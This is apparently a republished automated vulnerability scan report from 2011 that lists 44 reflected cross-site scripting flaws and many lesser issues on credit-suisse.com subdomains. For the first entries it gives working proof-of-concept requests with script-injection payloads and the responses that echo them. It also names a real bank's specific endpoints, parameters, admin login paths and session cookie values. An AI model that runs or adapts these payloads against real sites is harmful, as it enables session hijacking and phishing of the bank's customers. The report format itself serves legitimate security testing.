XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, credit-suisse.com

Report generated by XSS.CX at Mon Sep 19 15:39:11 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. https://emagazine.credit-suisse.com/app/home/ [name of an arbitrarily supplied request parameter]

XSS in emagazine.credit-suisse.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86, BHDB, Javascript Injection, Insecure Programming, Weak Configuration, Browser Hijacking, Phishing

1.2. https://emagazine.credit-suisse.com/app/home/index.cfm [fuseaction parameter]

1.3. https://emagazine.credit-suisse.com/app/home/index.cfm [name of an arbitrarily supplied request parameter]

1.4. https://infocus.credit-suisse.com/app/_return/ [name of an arbitrarily supplied request parameter]

1.5. https://infocus.credit-suisse.com/app/_return/index.cfm [name of an arbitrarily supplied request parameter]

1.6. https://infocus.credit-suisse.com/app/article/index.cfm [bhjs parameter]

1.7. https://infocus.credit-suisse.com/app/article/index.cfm [bhjs parameter]

1.8. https://infocus.credit-suisse.com/app/article/index.cfm [fuseaction parameter]

1.9. https://infocus.credit-suisse.com/app/article/index.cfm [fuseaction parameter]

1.10. https://infocus.credit-suisse.com/app/article/index.cfm [name of an arbitrarily supplied request parameter]

XSS in infocus.credit-suisse.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86, BHDB, Javascript Injection, Insecure Programming, Weak Configuration, Browser Hijacking, Phishing

1.11. https://infocus.credit-suisse.com/app/article/index.cfm [name of an arbitrarily supplied request parameter]

1.12. https://infocus.credit-suisse.com/app/error/ [name of an arbitrarily supplied request parameter]

1.13. https://infocus.credit-suisse.com/app/error/index.cfm [name of an arbitrarily supplied request parameter]

1.14. https://infocus.credit-suisse.com/app/legal/index.cfm [fuseaction parameter]

1.15. https://infocus.credit-suisse.com/app/legal/index.cfm [name of an arbitrarily supplied request parameter]

1.16. https://infocus.credit-suisse.com/app/newsletter/index.cfm [fuseaction parameter]

1.17. https://infocus.credit-suisse.com/app/newsletter/index.cfm [lang parameter]

1.18. https://infocus.credit-suisse.com/app/newsletter/index.cfm [name of an arbitrarily supplied request parameter]

1.19. https://infocus.credit-suisse.com/app/newsletter/index.cfm [ngoid parameter]

1.20. https://infocus.credit-suisse.com/app/print/index.cfm [fuseaction parameter]

1.21. https://infocus.credit-suisse.com/app/print/index.cfm [name of an arbitrarily supplied request parameter]

1.22. https://infocus.credit-suisse.com/app/rss/ [name of an arbitrarily supplied request parameter]

1.23. https://infocus.credit-suisse.com/app/rss/index.cfm [fuseaction parameter]

1.24. https://infocus.credit-suisse.com/app/rss/index.cfm [fuseaction parameter]

1.25. https://infocus.credit-suisse.com/app/rss/index.cfm [name of an arbitrarily supplied request parameter]

1.26. https://infocus.credit-suisse.com/app/rss/index.cfm [name of an arbitrarily supplied request parameter]

1.27. https://infocus.credit-suisse.com/app/sendpage/index.cfm [fuseaction parameter]

1.28. https://infocus.credit-suisse.com/app/sendpage/index.cfm [fuseaction parameter]

1.29. https://infocus.credit-suisse.com/app/sendpage/index.cfm [name of an arbitrarily supplied request parameter]

1.30. https://infocus.credit-suisse.com/app/sendpage/index.cfm [name of an arbitrarily supplied request parameter]

1.31. https://infocus.credit-suisse.com/app/shop/index.cfm [name of an arbitrarily supplied request parameter]

1.32. https://infocus.credit-suisse.com/app/topic/index.cfm [fuseaction parameter]

1.33. https://infocus.credit-suisse.com/app/topic/index.cfm [name of an arbitrarily supplied request parameter]

1.34. https://infocus.credit-suisse.com/index.cfm [page parameter]

1.35. https://responsibility.credit-suisse.com/app/_return/ [name of an arbitrarily supplied request parameter]

XSS in responsibility.credit-suisse.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86, BHDB, Javascript Injection, Insecure Programming, Weak Configuration, Browser Hijacking, Phishing

1.36. https://responsibility.credit-suisse.com/app/article/index.cfm [bhjs parameter]

1.37. https://responsibility.credit-suisse.com/app/article/index.cfm [fuseaction parameter]

1.38. https://responsibility.credit-suisse.com/app/article/index.cfm [name of an arbitrarily supplied request parameter]

1.39. https://responsibility.credit-suisse.com/app/error/ [name of an arbitrarily supplied request parameter]

1.40. https://responsibility.credit-suisse.com/app/newsletter/index.cfm [fuseaction parameter]

1.41. https://responsibility.credit-suisse.com/app/newsletter/index.cfm [lang parameter]

1.42. https://responsibility.credit-suisse.com/app/newsletter/index.cfm [name of an arbitrarily supplied request parameter]

1.43. https://responsibility.credit-suisse.com/app/newsletter/index.cfm [ngoid parameter]

1.44. https://responsibility.credit-suisse.com/index.cfm [page parameter]

2. SSL cookie without secure flag set

3. Cookie scoped to parent domain

3.1. https://emagazine.credit-suisse.com/

3.2. https://emagazine.credit-suisse.com/app/

3.3. https://emagazine.credit-suisse.com/app/home/

3.4. https://emagazine.credit-suisse.com/app/home/index.cfm

3.5. https://emagazine.credit-suisse.com/app/newsletter/index.cfm

3.6. https://infocus.credit-suisse.com/

3.7. https://infocus.credit-suisse.com/app/

3.8. https://infocus.credit-suisse.com/app/_admin/

3.9. https://infocus.credit-suisse.com/app/_control/

3.10. https://infocus.credit-suisse.com/app/_control/act_login_adminmode.cfm

3.11. https://infocus.credit-suisse.com/app/_gen/

3.12. https://infocus.credit-suisse.com/app/_gen/index.cfm

3.13. https://infocus.credit-suisse.com/app/_return/

3.14. https://infocus.credit-suisse.com/app/_return/index.cfm

3.15. https://infocus.credit-suisse.com/app/article/

3.16. https://infocus.credit-suisse.com/app/article/index.cfm

3.17. https://infocus.credit-suisse.com/app/article/index3.cfm

3.18. https://infocus.credit-suisse.com/app/error/

3.19. https://infocus.credit-suisse.com/app/error/index.cfm

3.20. https://infocus.credit-suisse.com/app/index.cfm

3.21. https://infocus.credit-suisse.com/app/legal/index.cfm

3.22. https://infocus.credit-suisse.com/app/newsletter/

3.23. https://infocus.credit-suisse.com/app/newsletter/index.cfm

3.24. https://infocus.credit-suisse.com/app/print/

3.25. https://infocus.credit-suisse.com/app/print/index.cfm

3.26. https://infocus.credit-suisse.com/app/rss/

3.27. https://infocus.credit-suisse.com/app/rss/index.cfm

3.28. https://infocus.credit-suisse.com/app/sendpage/

3.29. https://infocus.credit-suisse.com/app/sendpage/act_sendto.cfm

3.30. https://infocus.credit-suisse.com/app/sendpage/index.cfm

3.31. https://infocus.credit-suisse.com/app/shop/index.cfm

3.32. https://infocus.credit-suisse.com/app/sitemap/

3.33. https://infocus.credit-suisse.com/app/stat/

3.34. https://infocus.credit-suisse.com/app/topic/index.cfm

3.35. https://infocus.credit-suisse.com/index.cfm

3.36. https://responsibility.credit-suisse.com/

3.37. https://responsibility.credit-suisse.com/app/

3.38. https://responsibility.credit-suisse.com/app/_admin/

3.39. https://responsibility.credit-suisse.com/app/_control/

3.40. https://responsibility.credit-suisse.com/app/_control/act_login_adminmode.cfm

3.41. https://responsibility.credit-suisse.com/app/_gen/

3.42. https://responsibility.credit-suisse.com/app/_gen/index.cfm

3.43. https://responsibility.credit-suisse.com/app/_return/

3.44. https://responsibility.credit-suisse.com/app/article/

3.45. https://responsibility.credit-suisse.com/app/article/index.cfm

3.46. https://responsibility.credit-suisse.com/app/article/index3.cfm

3.47. https://responsibility.credit-suisse.com/app/error/

3.48. https://responsibility.credit-suisse.com/app/index.cfm

3.49. https://responsibility.credit-suisse.com/app/newsletter/index.cfm

3.50. https://responsibility.credit-suisse.com/app/print/

3.51. https://responsibility.credit-suisse.com/app/print/index.cfm

3.52. https://responsibility.credit-suisse.com/app/sendpage/

3.53. https://responsibility.credit-suisse.com/app/sitemap/

3.54. https://responsibility.credit-suisse.com/app/stat/

3.55. https://responsibility.credit-suisse.com/index.cfm

4. Cookie without HttpOnly flag set

5. Password field with autocomplete enabled

5.1. https://infocus.credit-suisse.com/app/_control/

5.2. https://responsibility.credit-suisse.com/app/_control/

6. Cross-domain Referer leakage

6.1. https://infocus.credit-suisse.com/app/_control/act_login_adminmode.cfm

6.2. https://infocus.credit-suisse.com/app/article/index.cfm

6.3. https://infocus.credit-suisse.com/app/article/index3.cfm

6.4. https://infocus.credit-suisse.com/app/print/index.cfm

6.5. https://infocus.credit-suisse.com/app/rss/index.cfm

6.6. https://infocus.credit-suisse.com/app/sendpage/index.cfm

6.7. https://infocus.credit-suisse.com/app/topic/index.cfm

6.8. https://responsibility.credit-suisse.com/app/_control/act_login_adminmode.cfm

6.9. https://responsibility.credit-suisse.com/app/article/index.cfm

6.10. https://responsibility.credit-suisse.com/app/article/index3.cfm

7. Email addresses disclosed

7.1. https://emagazine.credit-suisse.com/app/home/

7.2. https://emagazine.credit-suisse.com/app/home/index.cfm

7.3. https://emagazine.credit-suisse.com/jamez_customtags/control/functions.js

7.4. https://infocus.credit-suisse.com/app/article/index.cfm

7.5. https://infocus.credit-suisse.com/app/legal/index.cfm

7.6. https://infocus.credit-suisse.com/app/print/index.cfm

7.7. https://infocus.credit-suisse.com/app/rss/index.cfm

7.8. https://infocus.credit-suisse.com/app/sendpage/index.cfm

7.9. https://infocus.credit-suisse.com/app/shop/index.cfm

7.10. https://infocus.credit-suisse.com/app/topic/index.cfm

7.11. https://infocus.credit-suisse.com/data/rss/120658/EN/index.xml

7.12. https://infocus.credit-suisse.com/data/rss/120659/EN/index.xml

7.13. https://infocus.credit-suisse.com/data/rss/129126/EN/index.xml

7.14. https://infocus.credit-suisse.com/data/rss/172769/EN/index.xml

7.15. https://infocus.credit-suisse.com/data/rss/178706/EN/index.xml

7.16. https://infocus.credit-suisse.com/data/rss/188462/EN/index.xml

7.17. https://infocus.credit-suisse.com/data/rss/221715/EN/index.xml

7.18. https://infocus.credit-suisse.com/data/rss/282908/EN/index.xml

7.19. https://infocus.credit-suisse.com/data/rss/285457/EN/index.xml

7.20. https://infocus.credit-suisse.com/jamez_customtags/control/functions.js

7.21. https://responsibility.credit-suisse.com/app/article/index.cfm

7.22. https://responsibility.credit-suisse.com/jamez_customtags/control/functions.js

8. Private IP addresses disclosed

8.1. https://emagazine.credit-suisse.com/app/home/index.cfm

8.2. https://infocus.credit-suisse.com/app/_gen/index.cfm

9. Cacheable HTTPS response

9.1. https://emagazine.credit-suisse.com/app/home/

9.2. https://emagazine.credit-suisse.com/app/home/index.cfm

9.3. https://emagazine.credit-suisse.com/robots.txt

9.4. https://infocus.credit-suisse.com/app/_control/

9.5. https://infocus.credit-suisse.com/app/_control/act_login_adminmode.cfm

9.6. https://infocus.credit-suisse.com/app/_gen/

9.7. https://infocus.credit-suisse.com/app/_gen/index.cfm

9.8. https://infocus.credit-suisse.com/app/article/index.cfm

9.9. https://infocus.credit-suisse.com/app/article/index3.cfm

9.10. https://infocus.credit-suisse.com/app/print/

9.11. https://infocus.credit-suisse.com/app/print/index.cfm

9.12. https://infocus.credit-suisse.com/app/rss/index.cfm

9.13. https://infocus.credit-suisse.com/app/sendpage/

9.14. https://infocus.credit-suisse.com/app/sendpage/index.cfm

9.15. https://infocus.credit-suisse.com/app/topic/index.cfm

9.16. https://infocus.credit-suisse.com/data/rss/120658/EN/index.xml

9.17. https://infocus.credit-suisse.com/data/rss/120659/EN/index.xml

9.18. https://infocus.credit-suisse.com/data/rss/129126/EN/index.xml

9.19. https://infocus.credit-suisse.com/data/rss/172769/EN/index.xml

9.20. https://infocus.credit-suisse.com/data/rss/178706/EN/index.xml

9.21. https://infocus.credit-suisse.com/data/rss/188462/EN/index.xml

9.22. https://infocus.credit-suisse.com/data/rss/221715/EN/index.xml

9.23. https://infocus.credit-suisse.com/data/rss/282908/EN/index.xml

9.24. https://infocus.credit-suisse.com/data/rss/285457/EN/index.xml

9.25. https://infocus.credit-suisse.com/jamez_customtags/

9.26. https://infocus.credit-suisse.com/robots.txt

9.27. https://responsibility.credit-suisse.com/app/_control/

9.28. https://responsibility.credit-suisse.com/app/_control/act_login_adminmode.cfm

9.29. https://responsibility.credit-suisse.com/app/_gen/

9.30. https://responsibility.credit-suisse.com/app/_gen/index.cfm

9.31. https://responsibility.credit-suisse.com/app/article/index.cfm

9.32. https://responsibility.credit-suisse.com/app/article/index3.cfm

9.33. https://responsibility.credit-suisse.com/app/print/

9.34. https://responsibility.credit-suisse.com/app/print/index.cfm

9.35. https://responsibility.credit-suisse.com/app/sendpage/

9.36. https://responsibility.credit-suisse.com/robots.txt

10. Multiple content types specified

10.1. https://emagazine.credit-suisse.com/app/home/

10.2. https://emagazine.credit-suisse.com/app/home/index.cfm

10.3. https://infocus.credit-suisse.com/app/article/index.cfm

10.4. https://infocus.credit-suisse.com/app/print/index.cfm

10.5. https://infocus.credit-suisse.com/app/rss/index.cfm

10.6. https://infocus.credit-suisse.com/app/sendpage/index.cfm

10.7. https://infocus.credit-suisse.com/app/shop/index.cfm

10.8. https://infocus.credit-suisse.com/app/topic/index.cfm

10.9. https://responsibility.credit-suisse.com/app/article/index.cfm

11. HTML does not specify charset

11.1. https://emagazine.credit-suisse.com/app/home/index.cfm

11.2. https://infocus.credit-suisse.com/app/_gen/index.cfm

11.3. https://infocus.credit-suisse.com/jamez_customtags/

12. Content type incorrectly stated

12.1. https://emagazine.credit-suisse.com/robots.txt

12.2. https://infocus.credit-suisse.com/robots.txt

12.3. https://responsibility.credit-suisse.com/robots.txt



1. Cross-site scripting (reflected)  next
There are 44 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://emagazine.credit-suisse.com/app/home/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://emagazine.credit-suisse.com
Path:   /app/home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce156"><script>alert(1)</script>cc433ba6561 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/home/?ce156"><script>alert(1)</script>cc433ba6561=1 HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:47:35 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:47:35 GMT
expires: Mon, 19 Sep 2011 15:47:35 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/home/index.cfm?ce156"><script>alert(1)</script>cc433ba6561=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.2. https://emagazine.credit-suisse.com/app/home/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://emagazine.credit-suisse.com
Path:   /app/home/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f1f4"><script>alert(1)</script>2286eda2eeb was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/home/index.cfm?fuseaction=OpenSponsoring8f1f4"><script>alert(1)</script>2286eda2eeb&lang=EN HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:47:25 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:47:25 GMT
expires: Mon, 19 Sep 2011 15:47:25 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/home/index.cfm?fuseaction=OpenSponsoring8f1f4"><script>alert(1)</script>2286eda2eeb&amp;lang=EN#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.3. https://emagazine.credit-suisse.com/app/home/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://emagazine.credit-suisse.com
Path:   /app/home/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cac8"><script>alert(1)</script>a9cebca0244 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/home/index.cfm?8cac8"><script>alert(1)</script>a9cebca0244=1 HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:47:50 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:47:50 GMT
expires: Mon, 19 Sep 2011 15:47:50 GMT
Content-Language: it-CH
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/home/index.cfm?8cac8"><script>alert(1)</script>a9cebca0244=1#MID" title="Direttamente al contenuto" accesskey="1">
...[SNIP]...

1.4. https://infocus.credit-suisse.com/app/_return/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/_return/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa0e0"><script>alert(1)</script>b10373acf93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/_return/?fa0e0"><script>alert(1)</script>b10373acf93=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:37:09 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:37:09 GMT
expires: Mon, 19 Sep 2011 15:37:09 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/_return/index.cfm?fa0e0"><script>alert(1)</script>b10373acf93=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.5. https://infocus.credit-suisse.com/app/_return/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/_return/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff00"><script>alert(1)</script>5436ec4ca38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/_return/index.cfm?aff00"><script>alert(1)</script>5436ec4ca38=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:39:49 GMT
Server: Apache
Set-Cookie: CFID=38647286; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=9932378849fbeda01587b81cbfc3d766; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:39:49 GMT
expires: Mon, 19 Sep 2011 15:39:49 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/_return/index.cfm?aff00"><script>alert(1)</script>5436ec4ca38=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.6. https://infocus.credit-suisse.com/app/article/index.cfm [bhjs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The value of the bhjs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bbe6"><script>alert(1)</script>3336cff794c was submitted in the bhjs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=319037&lang=EN&bhjs=-19bbe6"><script>alert(1)</script>3336cff794c HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&aoid=319037&lang=EN
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:39:30 GMT
Server: Apache
Set-Cookie: CFID=38647286; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=9932378849fbeda01587b81cbfc3d766; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:39:31 GMT
expires: Mon, 19 Sep 2011 15:39:31 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&amp;aoid=319037&amp;lang=EN&amp;bhjs=-19bbe6"><script>alert(1)</script>3336cff794c#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.7. https://infocus.credit-suisse.com/app/article/index.cfm [bhjs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The value of the bhjs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 550fa"><script>alert(1)</script>677eab7dcdc was submitted in the bhjs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=319249&coid=64291&lang=EN&bhjs=-1550fa"><script>alert(1)</script>677eab7dcdc HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:43:06 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:43:06 GMT
expires: Mon, 19 Sep 2011 15:43:06 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&amp;aoid=319249&amp;coid=64291&amp;lang=EN&amp;bhjs=-1550fa"><script>alert(1)</script>677eab7dcdc#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.8. https://infocus.credit-suisse.com/app/article/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acfdd"><script>alert(1)</script>f2f9b8c78ed was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/article/index.cfm?fuseaction=OpenArticleacfdd"><script>alert(1)</script>f2f9b8c78ed&aoid=319249&coid=64291&lang=EN&bhjs=-1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:41:05 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:41:05 GMT
expires: Mon, 19 Sep 2011 15:41:05 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
